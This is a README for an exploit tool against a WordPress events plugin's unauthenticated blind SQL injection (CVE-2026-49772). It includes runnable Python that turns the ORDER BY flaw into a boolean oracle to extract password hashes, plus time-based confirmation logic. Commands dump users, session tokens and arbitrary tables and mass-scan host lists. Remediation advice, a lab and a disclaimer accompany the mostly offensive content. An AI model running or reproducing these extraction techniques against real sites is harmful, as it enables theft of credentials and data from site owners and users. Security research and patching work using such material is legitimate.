# The Events Calendar SQL Injection (CVE-2026-49772) PoC

Source: https://sploitus.com/exploit?id=4DC88245-D5D6-582C-AA2B-EE9293E136F3

## Description

CVE-2026-49772 is an **unauthenticated blind SQL injection** in the WordPress
plugin **The Events Calendar**. A broken REST parameter validator (`validate_callback`
returns a closure instead of validating) lets the `order` parameter on the
experimental `tec/v1` REST API reach the SQL `ORDER BY` clause unsanitised:

```
GET /wp-json/tec/v1/events?orderby=event_date&order=
```

```sql
... ORDER BY event_date , wp_posts.post_date DESC ...
```

This is a **read-only** injection (no stacked queries, no writes, no direct output),
but the whole database is extractable via a boolean or time-based oracle: user password
hashes, session tokens, application passwords, secret keys.

- **Affected versions:** The Events Calendar `6.15.12` to `6.16.2` (fixed in `6.16.3`)
- **Severity:** CVSS 3.1 `9.3` Critical, vector `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L`
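The sink described above, and the way a yes/no oracle built on it recovers data, as an added example that is not the PoC's or the plugin's own code. It models the `order` value being concatenated into `ORDER BY` verbatim, turns the resulting order flip into a boolean oracle, and binary-searches a scalar `SELECT` through it, which is the general shape of what the `--query`, `--users` and `--user-meta` actions do. The schema, rows, hash value and the sort-flipping payload (`* (CASE WHEN ... THEN 1 ELSE -1 END)`) are constructed for illustration and run against in-memory SQLite; the real target is MySQL, where `SUBSTR`/`UNICODE` correspond to `SUBSTRING`/`ORD`. The hardened variant shows the allowlist check a working `validate_callback` should have performed.

```python
"""
Constructed model of an ORDER BY injection turned into a boolean oracle.
Not the PoC's code: schema, data and payload are illustrative only.
"""
import sqlite3

ALLOWED_ORDER = {"ASC", "DESC"}  # what a real validate_callback should accept


def build_db():
    # Constructed stand-in for the WordPress database (SQLite, not MySQL).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE wp_posts(ID INTEGER PRIMARY KEY, event_date INTEGER,
                              post_date TEXT);
        INSERT INTO wp_posts VALUES (1, 1767225600, '2026-01-01'),
                                    (2, 1769904000, '2026-02-01'),
                                    (3, 1772323200, '2026-03-01');
        CREATE TABLE wp_users(ID INTEGER PRIMARY KEY, user_login TEXT,
                              user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bexamplehash');
    """)
    return con


def vulnerable_events(con, order):
    """The flawed endpoint: `order` is never validated, only concatenated."""
    sql = f"SELECT ID FROM wp_posts ORDER BY event_date {order}, post_date DESC"
    return [row[0] for row in con.execute(sql)]


def hardened_events(con, order):
    """Same query behind the allowlist check the validator should have done."""
    if order.upper() not in ALLOWED_ORDER:
        raise ValueError("order must be ASC or DESC")
    return vulnerable_events(con, order.upper())


def make_oracle(con):
    """Turn the row order into a yes/no answer for an arbitrary SQL condition.

    The payload multiplies the sort key by +1 or -1 depending on the
    condition, so a true condition keeps the baseline order and a false one
    reverses it.  Observing the first returned ID is enough.
    """
    baseline = vulnerable_events(con, "")[0]

    def oracle(condition):
        payload = f"* (CASE WHEN ({condition}) THEN 1 ELSE -1 END)"
        return vulnerable_events(con, payload)[0] == baseline

    return oracle


def _bsearch(oracle, expr, hi):
    """Smallest n in [0, hi] with NOT (expr > n); i.e. the value of expr."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_scalar(oracle, subquery, max_len=64):
    """Recover the result of a scalar SELECT one character at a time."""
    # Length first (about six oracle calls) instead of probing until empty.
    length = _bsearch(oracle, f"LENGTH(({subquery}))", max_len)
    chars = []
    for pos in range(1, length + 1):
        # Seven calls per character over the 7-bit ASCII range.
        code = _bsearch(oracle, f"UNICODE(SUBSTR(({subquery}), {pos}, 1))", 127)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    ask = make_oracle(db)
    print(extract_scalar(ask, "SELECT user_pass FROM wp_users WHERE ID = 1"))
```

Each oracle call is one HTTP request in the real tool, which is why the README's boolean oracle is the fast default: a 34-character phpass hash costs about 6 + 34 × 7 requests, and independent positions can be fetched in parallel threads.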

## Features

- **`--check`**: non-breaking detection (REST namespace, plugin version, time-based confirm)
- **`--recon`**: DB fingerprint (version, current user, database, OS, privileges, table prefix)
- **`--users`**: dump `wp_users` (logins, emails, password hashes)
- **`--user-meta`**: dump `wp_usermeta` (session tokens, application passwords, capabilities)
- **`--get-table`**: dump any table with automatic column discovery
- **`--query`**: extract the result of any scalar `SELECT`
- **Two oracles**: fast boolean (default) or time-based, multithreaded; no external dependencies

## Installation

Pure Python 3 standard library; `requirements.txt` is included for the standard
workflow but installs nothing extra.

### OSX / Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help
```

## Usage

```
python3 CVE-2026-49772.py   [options]
```

Pick exactly one action: `--check`, `--recon`, `--users`, `--user-meta`,
`--get-table` (takes a table name), `--query` (takes a scalar `SELECT`). Run `--help` for all options.

---

### Vulnerability check
```bash
python3 CVE-2026-49772.py target.tld --check
```
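The decision logic behind a time-based confirmation like the one `--check` performs, as an added example that is not the PoC's code. A single timed request is unreliable because network jitter can exceed a short `SLEEP`, so the check samples a baseline request and a delayed request several times and compares medians rather than single values. The transport is injected as a callable returning the observed round-trip time, so the logic runs offline against constructed timings; the threshold ratio and sample count are assumptions, not the tool's settings.

```python
"""
Jitter-tolerant time-based confirmation.  Not the PoC's code; the
transport and timings below are constructed for illustration.
"""
from statistics import median


def confirm_time_based(send, delay=3.0, samples=5, ratio=0.8):
    """Return (vulnerable, baseline_median, delayed_median).

    `send(delayed)` issues one request, with (True) or without (False) the
    sleeping payload, and returns the elapsed seconds.  The host counts as
    vulnerable when the delayed median exceeds the baseline median by at
    least `ratio * delay`, so a slow host is still judged against its own
    baseline and one jittery sample cannot flip the verdict either way.
    """
    baseline = median(send(False) for _ in range(samples))
    delayed = median(send(True) for _ in range(samples))
    return delayed - baseline >= ratio * delay, baseline, delayed


def fake_transport(timings):
    """Constructed transport replaying pre-recorded round-trip times."""
    queue = {False: list(timings["baseline"]), True: list(timings["delayed"])}

    def send(delayed):
        return queue[delayed].pop(0)

    return send


if __name__ == "__main__":
    # Constructed timings: one jittery baseline sample (1.9 s) and one
    # extra-slow delayed sample (5.0 s); the medians still separate cleanly.
    transport = fake_transport({"baseline": [0.20, 0.30, 1.90, 0.25, 0.22],
                                "delayed": [3.30, 3.20, 3.40, 3.10, 5.00]})
    print(confirm_time_based(transport, delay=3.0))
```

The boolean oracle stays the default because it needs no sleep at all; the time-based path is the fallback when the ordering of the response cannot be observed, and `--delay` should be raised on links whose baseline jitter approaches the configured sleep.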

### Database recon
```bash
python3 CVE-2026-49772.py target.tld --recon
```

### Dump users + password hashes
```bash
python3 CVE-2026-49772.py target.tld --users
```

### Extract a custom value
```bash
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"
```

Tuning: `--technique boolean|time`, `--delay`, `--threads`, `--rows`, `--prefix`,
`--where`, `-useragent`, `-timeout`. Scan many hosts with `-l targets.txt`.

## Docker PoC

A self-contained Docker Compose lab with the vulnerable plugin (bundled, not
downloaded at boot) and pre-seeded events. See [docker/DOCKER.md](docker/DOCKER.md).

```bash
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check
```

## Remediation

- Update The Events Calendar to **6.16.3** or later
- Until patched, block the `tec/v1` namespace at the WAF / reverse proxy. Cover both the `/wp-json/tec/v1/` path and the `?rest_route=/tec/v1/` query form that WordPress also accepts, otherwise a path-only rule is trivially bypassed

## References

- [The Events Calendar](https://theeventscalendar.com/)
- [Vulners: CVE-2026-49772](https://vulners.com/cve/CVE-2026-49772)
- [NVD: CVE-2026-49772](https://nvd.nist.gov/vuln/detail/CVE-2026-49772)
- [GitHub Advisory: GHSA-v796-wqfq-j4xh](https://github.com/advisories/GHSA-v796-wqfq-j4xh)
- [Patchstack โ€” The Events Calendar SQL Injection](https://patchstack.com/database/wordpress/plugin/the-events-calendar/)

## Disclaimer

This tool is provided for educational and research purposes only. Use it only
against systems you own or have explicit written permission to test. The creator
assumes no responsibility for any misuse or damage caused by this tool.